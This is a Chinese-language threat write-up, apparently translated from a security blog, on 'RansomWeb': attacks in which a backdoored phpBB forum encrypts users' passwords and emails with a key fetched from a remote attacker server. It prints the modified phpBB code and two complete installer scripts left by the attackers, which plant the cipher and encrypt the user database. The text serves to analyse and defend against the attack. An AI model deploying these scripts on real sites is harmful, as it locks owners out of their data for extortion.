RansomWeb:一種新興的web安全威脅
0x00 前言
目前越來越多的人稱為勒索軟體的受害者,惡意軟體會加密你的計算機直到你願意交保護費,最新的趨勢發現,網站已經成為犯罪分子的攻擊目標,犯罪軟體會加密你的資料庫直到你付錢。
source https://www.htbridge.com/blog/ransomweb_emerging_website_threat.html
0x01 守候
2014.12.** 我們的安全專家在一個理財網站上發現一個很有趣的案例:網站一直顯示無法連線資料庫,而網站管理員收到一封勒索郵件,“給錢,然後我們會給你資料庫解鎖”。
遇到這種型別攻擊的網站都是一些小型站點,但是公司的重點業務運營都是圍繞網站進行了,停了分分鐘幾萬,chinese一點地話來說,“網際網路公司”。
我們認真的進行了調查,發現一下幾點特點:
1 web應用程式在半年前被入侵,攻擊者修改了一些需要進行資料庫操作的指令碼,在插入資料時對資料進行加密,在查詢資料時對資料進行解密。整個過程 使用者沒有感到任何異樣。
2 只對關鍵的資料庫表被進行加密,將對網站效能的影響降到了最低,並且加密了之前被存入的資料庫記錄。
3 加密金鑰被儲存在遠端伺服器上,只能透過https訪問(一定可能性是為了防止被攔截)
4 在這6個月,駭客默默地守候著網站,當一些升級和運維行為時對伺服器進行備份。
5 在xxx天后,駭客關閉遠端伺服器,同時網站停止服務,and收到一封飽含著愛意的惡意郵件。
0x02 另一個案例
我們一開始相信這是一個針對部分公司進行的apt行為,屬於一個特殊的個別案例,不過後來發現我們錯了,上週我們又發現一個相似的例子,來自我們的另一個客戶。他收到了一個勒索郵件。。。在他的phpbb論壇失靈之後。對於客戶來說這個phpBB是一個非常重要的平臺,版本還是2014年11月25日釋出的phpBB 3.1.2 最新版。
最早問題來之於當時沒有一個使用者可以登入論壇,包括版主和管理員,使用者的認證功能已經失效,在我們的調查下發現,登入時需要的密碼和郵箱驗證在插入資料褲的時候經過了一次加密。
我們發現下列檔案遭到了修改。
1. factory.php
函式sql_fetchrow()遭到了修改,在進行sql查詢
#!php
$result = $this->get_driver()->sql_fetchrow($query_id);
password 和 email欄位會經過一次解密。
#!php
if(isset($result['user_password'])){
$result['user_password'] = $cipher->decrypt($result['user_password']);
}
if(isset($result['user_email'])){
$result['user_email'] = $cipher->decrypt($result['user_email']);
}
2. functions_user.php
函式 user_add 經過修改之後 新增資料時會被加密
#!php
$sql_ary = array(
'username'=>$user_row['username'],
'username_clean' => $username_clean,
'user_password' => (isset($user_row['user_password']))?
$cipher->encrypt($user_row['user_password']):$cipher->encrypt(''),
'user_email'=> $cipher->encrypt(strtolower($user_row['user_email'])),
'user_email_hash'=> phpbb_email_hash($user_row['user_email']),
'group_id' => $user_row['group_id'],
'user_type' => $user_row['user_type'],
);
3. cp_activate.php
main 函式遭到修改
#!php
$sql_ary = array(
'user_actkey' => '',
'user_password' => $cipher->encrypt($user_row['user_newpasswd']),
'user_newpasswd' => '',
'user_login_attempts' => 0,
);
4. ucp_profile.php
main函式。。。
#!php
if (sizeof($sql_ary))
{
$sql_ary['user_email'] = $cipher->encrypt($sql_ary['user_email']);
$sql_ary['user_password'] = $cipher->encrypt($sql_ary['user_password']);
$sql = 'UPDATE ' . USERS_TABLE . '
SET ' . $db->sql_build_array('UPDATE', $sql_ary) . '
WHERE user_id = ' . $user->data['user_id'];
$db->sql_query($sql);
5. config.php
#!php
class Cipher {
private $securekey, $iv;
function __construct($textkey) {
$this->securekey = hash('sha256',$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents('https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt');
$cipher=new Cipher($key);
一個值得注意的是,我們發現駭客留下的兩個可以自動化安裝後門的指令碼,可以對任意phpbb論壇植入後門程式,只需要幾下點選,第一個修改 “config.php” 新增 cipher類在指令碼中,其中可以看到 儲存在遠端伺服器上的 金鑰。
安裝檔案
#!php
<?php
$file = '../config.php';
$txt = "\n".'class Cipher {
private $securekey, $iv;
function __construct($textkey) {
$this->securekey = hash(\'sha256\',$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents(\'https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt\');
$cipher=new Cipher($key);'."\n";
if( FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)){
echo "DONE!";
};
第二個安裝檔案加密所有使用者的 email和password,並替換上述檔案。
#!php
<?php
define('IN_PHPBB', true);
$phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : '../';
$phpEx = substr(strrchr(__FILE__, '.'), 1);
include($phpbb_root_path . 'common.' . $phpEx);
include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
$sql = 'SELECT user_id, user_password, user_email FROM ' . USERS_TABLE;
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
{
$sql2 = 'UPDATE ' . USERS_TABLE . '
SET
user_password = "'.$cipher->encrypt($row['user_password']).'",
user_email = "'.$cipher->encrypt($row['user_email']).'"
WHERE user_id = '.$row['user_id'];
$result2 = $db->sql_query($sql2);
}
echo "SQL UPDATED!<br>";
copy('factory.php', '../phpbb/db/driver/factory.php');
copy('functions_user.php', '../includes/functions_user.php');
copy('ucp_activate.php', '../includes/ucp/ucp_activate.php');
copy('ucp_profile.php', '../includes/ucp/ucp_profile.php');
echo "FILES UPDATED!”;
接著攻擊者等待兩個月,就從遠端伺服器中取出金鑰。
0x03 結論
我們稱這種攻擊為 RansomWeb , 我們做了一個簡要的分析:
RansomWeb 的特點
1 與ddos不同,這種攻擊會對網站的可用性造成長時間的巨大影響。
2 不僅可以用於勒索,還可以用於其他很多用途。
3 不給錢想從攻擊中恢復很困難。
RansomWeb 的弱點
1 做下檔案監控就好了
2 在不對網站造成影響的情況下加密極其困難。
3 定期檢測更新
相關文章
- 網路安全威脅的新變化
- Linux 新的安全威脅-外星 hacker(轉)Linux
- 2020年新威脅,無人機可能成為主要的網路安全威脅無人機
- 盤點常見的7種網路安全威脅
- 郵件安全威脅
- 什麼才是解決WEB安全威脅的關鍵因素Web
- 機器學習:安全還是威脅?機器學習
- 網路安全威脅國家安全
- 新技術,新威脅 十大Web2.0下的攻擊(轉)Web
- 新技術 新威脅 Web2.0下的十大攻擊(轉)Web
- 新基建下的威脅狩獵|看綠盟綜合威脅分析系統
- 什麼是網路安全威脅?常見威脅有哪些?
- 7月第4周安全回顧 Web安全威脅目標轉移 Excel成垃圾新貴薦WebExcel
- 最常見的7種無線區域網安全威脅詳解!
- Secureworks 威脅評分迎來網路安全 AI 新時代AI
- 對 *nix WEB伺服器的一個隱藏威脅Web伺服器
- Websense網際網路威脅報告:Web威脅更具混合性Web
- 網路安全威脅資訊格式規範正式釋出 國內威脅情報發展迎來新階段
- 潛藏在手機中的新威脅:免安裝應用安全指北
- 安全要素與 STRIDE 威脅IDE
- 網站容易受到哪些安全威脅網站
- 歐盟智慧交通面臨安全威脅
- 調查顯示:Web2.0是企業今年的最大安全威脅Web
- 常見的網路安全威脅詳解!
- 網路安全(一):常見的網路威脅及防範
- 如何有效區分網路安全威脅?
- 【STRIDE】【1】安全威脅分析設計IDE
- 物理隔離內網面臨的安全威脅內網
- 網路安全中*具威脅的攻擊方式!
- 當今世介面臨的九大安全威脅
- 資料安全面臨的7個威脅,一定要知道!
- 應對網路威脅NGFW看得懂的安全更安全
- 資訊保安最常見的5種主要威脅詳解!
- 網路安全需求分析,傳統威脅有增無減新型威脅層出不窮
- 資料安全面臨的7個威脅,你一定要了解!
- 工作場所中的網路郵件 另一個安全威脅(轉)
- 雲端計算安全,主要面臨哪些威脅?
- 網路安全“零日威脅”近在咫尺